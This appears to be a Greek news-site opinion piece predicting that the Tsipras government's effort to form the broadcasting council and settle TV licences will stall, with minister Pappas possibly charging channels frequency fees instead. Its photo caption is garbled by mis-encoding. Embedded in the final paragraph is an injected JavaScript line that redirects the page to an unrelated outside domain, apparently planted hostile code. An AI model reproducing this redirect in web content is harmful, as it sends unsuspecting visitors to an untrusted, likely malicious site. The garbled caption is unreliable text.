Ο Τσίπρας αποφάσισε να μη δώσει καθόλου τηλεοπτικές άδειες;

0
8
ÁÈÇÍÁ-ÂÏÕËÇ-Óôçí ÏëïìÝëåéá ç ôñïðïëïãßá ãéá ôéò ôçëåïðôéêÝò Üäåéåò// Ï ÐÑÙÈÕÐÏÕÑÃÏÓ ÁËÅÎÇÓ ÔÓÉÐÑÁÓ.(Eurokinissi-ÆÙÍÔÁÍÏÓ ÁËÅÎÁÍÄÑÏÓ)

 

Όλα δείχνουν ότι θα πέσει στο κενό και η νέα προσπάθεια συγκρότησης του Εθνικού Συμβουλίου Ραδιοτηλεόρασης, παρά τη μη επιδεχόμενη παρερμηνειών απόφαση του Συμβουλίου Επικρατείας ότι μόνο αυτή η Ανεξάρτητη Αρχή είναι αρμόδια για τις τηλεοπτικές άδειες.

Η κυβέρνηση αποφάσισε να συγκληθεί η διάσκεψη των προέδρων στη Βουλή πριν παρουσιάσει το νομοθέτημα, το οποίο θα αντικαταστήσει τον αντισυνταγματικό νόμο Παππά -πρωτοβουλία που αντιμετωπίζεται απολύτως αρνητικά από την αντιπολίτευση. Τόσο η ΝΔ, όσο και το ΠΑΣΟΚ και το Ποτάμι, ζητούν να αποδοθούν πλήρεις αρμοδιότητες στο ΕΣΡ και, πριν γίνει προσπάθεια συγκρότησής του, να ξεκαθαριστεί το νομοθετικό πλαίσιο. Θεωρούν δε αναγκαίο να δημοσιοποιηθεί το σκεπτικό της απόφασης του ΣτΕ (θα χρειαστούν περίπου 20 μέρες) πριν γίνει οτιδήποτε.

Τα σημερινά δεδομένα παραπέμπουν σε ένα προαναγγελθέν ναυάγιο. Η κυβέρνηση εξακολουθεί να πιστεύει ότι το νέο τηλεοπτικό τοπίο πρέπει να διαμορφωθεί κατά τη δική της αντίληψη, η δε αντιπολίτευση δεν της αναγνωρίζει πλέον κανενός είδους δικαίωμα στην υπόθεση.

Τι θα γίνει, λοιπόν; Ο Αλέξης Τσίπρας θα καταγγέλλει ότι η αντιπολίτευση στηρίζει τους «καναλάρχες της διαπλοκής», με την άρνησή της να συσταθεί ΕΣΡ, και ο Κυριάκος Μητσοτάκης την κυβέρνηση ότι επιχειρεί και πάλι να παρανομήσει, παρά το στραπάτσο από το ΣτΕ.

Αποτέλεσμα, μηδέν; Όχι ακριβώς. Ο Νίκος Παππάς πιστεύει ότι στη μεταβατική περίοδο, μέχρι τη σύγκληση του ΕΣΡ, έχει δικαίωμα να ορίσει ειδικό τέλος για τα κανάλια που εκπέμπουν ήδη -ένα είδος ενοικίου για την κατοχή της συχνότητας. Ήδη έχει αφήσει να εννοηθεί ότι αυτό θα μπορούσε να είναι περίπου 7 εκατ. ευρώ τον χρόνο για Mega, Star, Alpha, Σκάι, Αντέννα, Epsilon, Art.

Έτσι, θα μπορεί να επαίρεται ότι βάζει τους καναλάρχες να πληρώσουν, παρά την «επιτυχημένη προσπάθειά τους να χειραγωγήσουν την απόφαση των δικαστών του ΣτΕ». Και, ταυτόχρονα, να υποστηρίζει ότι αποκαλύφθηκε η αληθινή στόχευση της ΝΔ, που εξαρχής ήταν η προστασία των διαπλεκόμενων συμφερόντων.

Πού οδηγούν όλα αυτά; Στην παράταση της σημερινής ανομίας, ενδεχομένως έως τις εκλογές, οπότε ο Αλέξης Τσίπρας

* πρώτον, θα επιχειρήσει να πείσει την κοινή γνώμη ότι προσπάθησε να δώσει νόμιμες άδειες, αλλά τον εμπόδισαν τα «συνεταιράκια της διαπλοκής» – οι καναλάρχες και «το παιδί της Siemens», όπως αποκαλεί πλέον τον Κυριάκο Μητσοτάκη

* και δεύτερον, ότι παρά τη «λυσσώδη» αντίσταση του «παλαιού καθεστώτος» έβαλε τους πλούσιους καναλάρχες να πληρώνουν για τις συχνότητες.

Υπάρχει κάτι που θα μπορούσε να αλλάξει τη διαφαινόμενη εξέλιξη; Προς το παρόν μάλλον όχι. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here